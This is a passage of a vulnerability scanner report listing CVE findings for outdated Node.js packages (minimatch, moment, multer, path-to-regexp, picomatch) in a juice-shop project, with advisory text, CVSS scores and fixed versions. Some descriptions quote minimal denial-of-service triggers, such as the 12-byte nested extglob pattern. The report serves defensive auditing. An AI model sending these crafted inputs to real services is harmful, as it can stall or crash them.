+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 165: CVE-2026-26996 Minimatch 9.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch9.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/glob/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 166: CVE-2026-27903 Minimatch 9.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch9.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/glob/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 167: CVE-2026-27904 Minimatch 9.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch9.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/glob/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 168: CVE-2017-18214 Moment 2.0.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
moment2.0.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/moment/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

nodejs-moment: Regular expression denial of service
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.19.3

+

The moment module before 2.19.3 for Node.js is prone to a regular +expression denial of service via a crafted date string, a different +vulnerability than CVE-2016-4055.

+ + +
Mitigation
+

2.19.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2017-18214
+https://github.com/advisories/GHSA-446m-mv8f-q348
+https://github.com/moment/moment
+https://github.com/moment/moment/commit/69ed9d44957fa6ab12b73d2ae29d286a857b80eb
+https://github.com/moment/moment/issues/4163
+https://github.com/moment/moment/pull/4326
+https://nodesecurity.io/advisories/532
+https://nvd.nist.gov/vuln/detail/CVE-2017-18214
+https://ubuntu.com/security/notices/USN-4786-1
+https://www.cve.org/CVERecord?id=CVE-2017-18214
+https://www.npmjs.com/advisories/532
+https://www.tenable.com/security/tns-2019-02

+ + + + + + + +
+
+
+
+ Finding 169: CVE-2022-24785 Moment 2.0.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
moment2.0.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/moment/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

+ + +
Description
+

Moment.js: Path traversal in moment.locale
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.29.2

+

Moment.js is a JavaScript date library for parsing, validating, +manipulating, and formatting dates. A path traversal vulnerability +impacts npm (server) users of Moment.js between versions 1.0.1 and +2.29.1, especially if a user-provided locale string is directly used to +switch moment locale. This problem is patched in 2.29.2, and the patch +can be applied to all affected versions. As a workaround, sanitize the +user-provided locale name before passing it to Moment.js.

+ + +
Mitigation
+

2.29.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-24785
+https://github.com/moment/moment
+https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5
+https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4
+https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/ +message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/ +message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q/
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5/
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5
+https://nvd.nist.gov/vuln/detail/CVE-2022-24785
+https://security.netapp.com/advisory/ntap-20220513-0006
+https://security.netapp.com/advisory/ntap-20220513-0006/
+https://security.netapp.com/advisory/ntap-20241108-0002
+https://security.netapp.com/advisory/ntap-20241108-0002/
+https://ubuntu.com/security/notices/USN-5559-1
+https://www.cve.org/CVERecord?id=CVE-2022-24785
+https://www.tenable.com/security/tns-2022-09

+ + + + + + + +
+
+
+
+ Finding 171: CVE-2025-47935 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 401 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

Multer vulnerable to Denial of Service via memory leaks from unclosed streams
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.0

+

Multer is a node.js middleware for handling multipart/form-data. + Versions prior to 2.0.0 are vulnerable to a resource exhaustion and +memory leak issue due to improper stream handling. When the HTTP request + stream emits an error, the internal busboy stream is not +closed, violating Node.js stream safety guidance. This leads to unclosed + streams accumulating over time, consuming memory and file descriptors. +Under sustained or repeated failure conditions, this can result in +denial of service, requiring manual server restarts to recover. All +users of Multer handling file uploads are potentially impacted. Users +should upgrade to 2.0.0 to receive a patch. No known workarounds are +available.

+ + +
Mitigation
+

2.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665
+https://github.com/expressjs/multer/pull/1120
+https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5
+https://nvd.nist.gov/vuln/detail/CVE-2025-47935

+ + + + + + + +
+
+
+
+ Finding 172: CVE-2025-47944 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 248 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

Multer vulnerable to Denial of Service from maliciously crafted requests
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.0

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability that is present starting in version 1.4.4-lts.1 and +prior to version 2.0.0 allows an attacker to trigger a Denial of Service + (DoS) by sending a malformed multi-part upload request. This request +causes an unhandled exception, leading to a crash of the process. Users +should upgrade to version 2.0.0 to receive a patch. No known workarounds + are available.

+ + +
Mitigation
+

2.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665
+https://github.com/expressjs/multer/issues/1176
+https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h
+https://nvd.nist.gov/vuln/detail/CVE-2025-47944

+ + + + + + + +
+
+
+
+ Finding 173: CVE-2025-48997 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 248 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + + +
Description
+

multer: Multer vulnerable to Denial of Service via unhandled exception
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.1

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability that is present starting in version 1.4.4-lts.1 and +prior to version 2.0.1 allows an attacker to trigger a Denial of Service + (DoS) by sending an upload file request with an empty string field +name. This request causes an unhandled exception, leading to a crash of +the process. Users should upgrade to 2.0.1 to receive a patch. No known workarounds are available.

+ + +
Mitigation
+

2.0.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-48997
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9
+https://github.com/expressjs/multer/issues/1233
+https://github.com/expressjs/multer/pull/1256
+https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg
+https://nvd.nist.gov/vuln/detail/CVE-2025-48997
+https://www.cve.org/CVERecord?id=CVE-2025-48997

+ + + + + + + +
+
+
+
+ Finding 174: CVE-2025-7338 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 248 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

multer: Multer Denial of Service
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.2

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability that is present starting in version 1.4.4-lts.1 and +prior to version 2.0.2 allows an attacker to trigger a Denial of Service + (DoS) by sending a malformed multi-part upload request. This request +causes an unhandled exception, leading to a crash of the process. Users +should upgrade to version 2.0.2 to receive a patch. No known workarounds + are available.

+ + +
Mitigation
+

2.0.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-7338
+https://cna.openjsf.org/security-advisories.html
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b
+https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p
+https://nvd.nist.gov/vuln/detail/CVE-2025-7338
+https://www.cve.org/CVERecord?id=CVE-2025-7338

+ + + + + + + +
+
+
+
+ Finding 175: CVE-2026-2359 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 772 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + + +
Description
+

multer: Multer: Denial of Service via dropped file upload connections
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.1.0

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability in Multer prior to version 2.1.0 allows an attacker to +trigger a Denial of Service (DoS) by dropping connection during file +upload, potentially causing resource exhaustion. Users should upgrade to + version 2.1.0 to receive a patch. No known workarounds are available.

+ + +
Mitigation
+

2.1.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-2359
+https://cna.openjsf.org/security-advisories.html
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab
+https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc
+https://nvd.nist.gov/vuln/detail/CVE-2026-2359
+https://www.cve.org/CVERecord?id=CVE-2026-2359

+ + + + + + + +
+
+
+
+ Finding 176: CVE-2026-3304 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 459 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + + +
Description
+

multer: Multer: Denial of Service via malformed requests
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.1.0

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability in Multer prior to version 2.1.0 allows an attacker to +trigger a Denial of Service (DoS) by sending malformed requests, +potentially causing resource exhaustion. Users should upgrade to version + 2.1.0 to receive a patch. No known workarounds are available.

+ + +
Mitigation
+

2.1.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-3304
+https://cna.openjsf.org/security-advisories.html
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee
+https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p
+https://nvd.nist.gov/vuln/detail/CVE-2026-3304
+https://www.cve.org/CVERecord?id=CVE-2026-3304

+ + + + + + + +
+
+
+
+ Finding 177: CVE-2026-3520 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + + +
Description
+

multer: Multer: Denial of Service via malformed requests
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.1.1

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability in Multer prior to version 2.1.1 allows an attacker to +trigger a Denial of Service (DoS) by sending malformed requests, +potentially causing stack overflow. Users should upgrade to version +2.1.1 to receive a patch. No known workarounds are available.

+ + +
Mitigation
+

2.1.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-3520
+https://cna.openjsf.org/security-advisories.html
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752
+https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2
+https://nvd.nist.gov/vuln/detail/CVE-2026-3520
+https://www.cve.org/CVERecord?id=CVE-2026-3520

+ + + + + + + +
+
+
+
+ Finding 179: CVE-2026-4867 Path-to-Regexp 0.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
path-to-regexp0.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/path-to-regexp/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

path-to-regexp: path-to-regexp: Denial of Service via catastrophic backtracking from malformed URL parameters
+Target: Node.js
+Type: node-pkg
+Fixed version: 0.1.13

+

Impact:

+

A bad regular expression is generated any time you have three or more + parameters within a single segment, separated by something that is not a + period (.). For example, /:a-:b-:c or /:a-:b-:c-:d. The backtrack +protection added in path-to-regexp@0.1.12 only prevents ambiguity for +two parameters. With three or more, the generated lookahead does not +block single separator characters, so capture groups overlap and cause +catastrophic backtracking.

+

Patches:

+

Upgrade to path-to-regexp@0.1.13

+

Custom regex patterns in route definitions (e.g., +/:a-:b([^-/]+)-:c([^-/]+)) are not affected because they override the +default capture group.

+

Workarounds:

+

All versions can be patched by providing a custom regular expression +for parameters after the first in a single segment. As long as the +custom regular expression does not match the text before the parameter, +you will be safe. For example, change /:a-:b-:c to +/:a-:b([^-/]+)-:c([^-/]+).

+

If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length.

+ + +
Mitigation
+

0.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-4867
+https://blakeembrey.com/posts/2024-09-web-redos
+https://cna.openjsf.org/security-advisories.html
+https://github.com/advisories/GHSA-9wv6-86v2-598j
+https://github.com/pillarjs/path-to-regexp
+https://github.com/pillarjs/path-to-regexp/releases/tag/v.0.1.13
+https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-37ch-88jc-xwx2
+https://nvd.nist.gov/vuln/detail/CVE-2026-4867
+https://www.cve.org/CVERecord?id=CVE-2026-4867

+ + + + + + + +
+
+
+
+ Finding 180: CVE-2026-33671 Picomatch 2.3.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
picomatch2.3.1
+ + + + + + + +
File Path
juice-shop/node_modules/picomatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.4, 3.0.2, 2.3.2

+

Picomatch is a glob matcher written JavaScript. Versions prior to +4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of +Service (ReDoS) when processing crafted extglob patterns. Certain +patterns using extglob quantifiers such as +() and *(), + especially when combined with overlapping alternatives or nested +extglobs, are compiled into regular expressions that can exhibit +catastrophic backtracking on non-matching input. Applications are +impacted when they allow untrusted users to supply glob patterns that +are passed to picomatch for compilation or matching. In +those cases, an attacker can cause excessive CPU consumption and block +the Node.js event loop, resulting in a denial of service. Applications +that only use trusted, developer-controlled glob patterns are much less +likely to be exposed in a security-relevant way. This issue is fixed in +picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these +versions or later, depending on their supported release line. If +upgrading is not immediately possible, avoid passing untrusted glob +patterns to picomatch. Possible mitigations include disabling extglob support for untrusted patterns by using noextglob: true, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as +() and *(), + enforcing strict allowlists for accepted pattern syntax, running +matching in an isolated worker or separate process with time and +resource limits, and applying application-level request throttling and +input validation for any endpoint that accepts glob patterns.

+ + +
Mitigation
+

4.0.4, 3.0.2, 2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33671
+https://github.com/micromatch/picomatch
